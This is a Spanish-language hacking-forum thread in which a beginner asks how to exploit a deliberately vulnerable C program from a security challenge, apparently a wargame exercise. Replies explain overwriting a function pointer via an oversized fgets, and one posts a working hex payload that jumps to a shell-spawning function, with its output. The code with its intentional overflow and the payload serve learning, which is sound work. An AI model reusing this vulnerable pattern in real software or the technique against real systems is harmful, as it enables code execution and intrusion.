Abril 28, 2017, 12:26:29 am

Autor Tema: Duda reto seguridad  (Leído 2710 veces)

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado espartacomaster

  • Me das tu IP?
  • *
  • Mensajes: 4
    • Ver Perfil
Duda reto seguridad
« en: Agosto 05, 2016, 10:13:15 am »
Buenas. Estoy iniciandome en esto y aun ando bastante perdido.
El codigo fuente a analizar es este:
/*
gcc -m32 -fno-stack-protector -o ch15 ch15.c
*/

#include <stdio.h>
#include <stdlib.h>

void shell() {
    system("/bin/dash");
}

void sup() {
    printf("Hey dude ! Waaaaazzaaaaaaaa ?!\n");
}

main()
{
    int var;
    void (*func)()=sup;
    char buf[128];
    fgets(buf,133,stdin);
    func();
}



Hasta ahora he obtenido que se produce segmentation fault al introducir una cadena de longitud 133 .
Analizando un poco con gdb , al consultar el contenido de memoria en ESP, veo que los "A" que se escriben lo hacen a partir de la direccion 0xbffffb1c. La pregunta es ¿sabiendo ya esto, puedo explotar la aplicacion?

Desconectado seth

  • Bot que informa de la existencia de las faqs
  • G#
  • **
  • Mensajes: 7876
  • Sexo: Masculino
    • Ver Perfil
Re:Duda reto seguridad
« Respuesta #1 en: Agosto 05, 2016, 11:22:47 am »
La idea es que en esp pongas la direccion donde empiezan los A, y que esos A despues los cambies por una shellcode


Ves links a xd-blog.com.ar que no andan? buscalos en You are not allowed to view links. Register or Login

Desconectado espartacomaster

  • Me das tu IP?
  • *
  • Mensajes: 4
    • Ver Perfil
Re:Duda reto seguridad
« Respuesta #2 en: Agosto 05, 2016, 11:33:25 am »

claro. es lo que he hecho.
python -c 'print "SHELLCODE BIN/DASH" + "RELLENO AAAA" + "DIRECCION MEMORIA COMIENZA AAAA" ' | ./progr

me sale segmentation fault y no me abre shell

Desconectado seth

  • Bot que informa de la existencia de las faqs
  • G#
  • **
  • Mensajes: 7876
  • Sexo: Masculino
    • Ver Perfil
Re:Duda reto seguridad
« Respuesta #3 en: Agosto 05, 2016, 12:49:33 pm »
A donde queda apuntando el stack pointer cuando tira segmentation fault?

Desconectado espartacomaster

  • Me das tu IP?
  • *
  • Mensajes: 4
    • Ver Perfil
Re:Duda reto seguridad
« Respuesta #4 en: Agosto 06, 2016, 10:16:10 am »
Aqui va informacion :

Desconectado espartacomaster

  • Me das tu IP?
  • *
  • Mensajes: 4
    • Ver Perfil
Re:Duda reto seguridad
« Respuesta #5 en: Agosto 06, 2016, 12:06:45 pm »
he de decir tambien que ni el stack ni el heap son ejecutables

Desconectado jep

  • Night Elf Druid
  • Moderador
  • *****
  • Mensajes: 1763
  • Sexo: Masculino
  • Avatar by 5475UK1
    • Ver Perfil
Re:Duda reto seguridad
« Respuesta #6 en: Agosto 08, 2016, 10:48:46 am »
En tu prueba ya te pasaste de "AAAA" está tratando de ejecutar 0x41414141 que es "AAAA"

A mí me anduvo así:
Generé el documento en un editor hex, e introduje asi:
Código: You are not allowed to view links. Register or Login
./sof < in2.txt

Entrada:
Código: You are not allowed to view links. Register or Login
00000000: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000010: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000020: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000030: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000040: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000050: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000060: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000070: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000080: fb84 0408

Salida:
Código: You are not allowed to view links. Register or Login
sh: /bin/dash: No such file or directory

0x080484fb es la dirección de memoria donde comienza la shell, ese es el valor que tenes que tratar de que se cargue en tu caso 0x08048464

toqué probé algunas cosas, por eso me quedó diferente
« Última modificación: Agosto 08, 2016, 11:00:18 am por jep »

Desconectado OnTheCore

  • Si te metes con CPH
    te metes conmigo
  • ****
  • Mensajes: 1610
  • Sexo: Masculino
    • Ver Perfil
Re:Duda reto seguridad
« Respuesta #7 en: ſeptiembre 22, 2016, 07:23:38 pm »
Vas a tener que ver hacer ROP chain si queres ejecutar una shellcode
No me mandes mensajes privados sobre troyanitos,  "crypters" o alguna otra boludez. No voy a ser tu maestro personal ni te voy a vender un curso para ser hacker. Si me envias un mensaje asi, probablemente no te guste la respuesta.


xx
Duda con la seguridad wap

Iniciado por passlogin

0 Respuestas
470 Vistas
Último mensaje Julio 25, 2014, 03:06:34 am
por passlogin
xx
Duda con seguridad

Iniciado por dhararon

5 Respuestas
1664 Vistas
Último mensaje Junio 19, 2009, 06:08:08 am
por hund
xx
duda de seguridad

Iniciado por danielji

5 Respuestas
1167 Vistas
Último mensaje Octubre 28, 2009, 12:44:35 am
por wanm28
question
duda con mi nivel de seguridad

Iniciado por conker93

8 Respuestas
1378 Vistas
Último mensaje Julio 20, 2009, 11:19:24 am
por TokioDrift
xx
[Duda]Al burlar seguridad de juego

Iniciado por slayerlp55

4 Respuestas
1393 Vistas
Último mensaje Marzo 27, 2012, 08:25:18 pm
por cibergolen
question
duda sobre seguridad de este upload

Iniciado por comcom.com

32 Respuestas
5608 Vistas
Último mensaje Enero 07, 2013, 01:58:35 pm
por comcom.com
exclamation
Un ataque pone en duda la seguridad del https

Iniciado por WaesWaes

0 Respuestas
471 Vistas
Último mensaje Marzo 26, 2011, 11:22:31 am
por WaesWaes
resuelto
Seguridad goblal, fin del anonimato, no privacidad de datos, 100% seguro. duda.

Iniciado por quieroaprender

4 Respuestas
683 Vistas
Último mensaje ſeptiembre 24, 2011, 07:11:33 am
por .xAk.
xx
DUDA SOBRE MAC Y LA SEGURIDAD, POR FAVOR AYUDENME QUE ESTOY PONIENDO NEGRO, XFA!

Iniciado por quieroaprender

3 Respuestas
1226 Vistas
Último mensaje Agosto 01, 2012, 04:26:16 pm
por locvtvs
question
Seguridad - Preguntas sobre si activar o desactivar Protocolos para seguridad..

Iniciado por alasis12extraviadapass

9 Respuestas
1749 Vistas
Último mensaje Mayo 28, 2012, 08:53:41 am
por cibergolen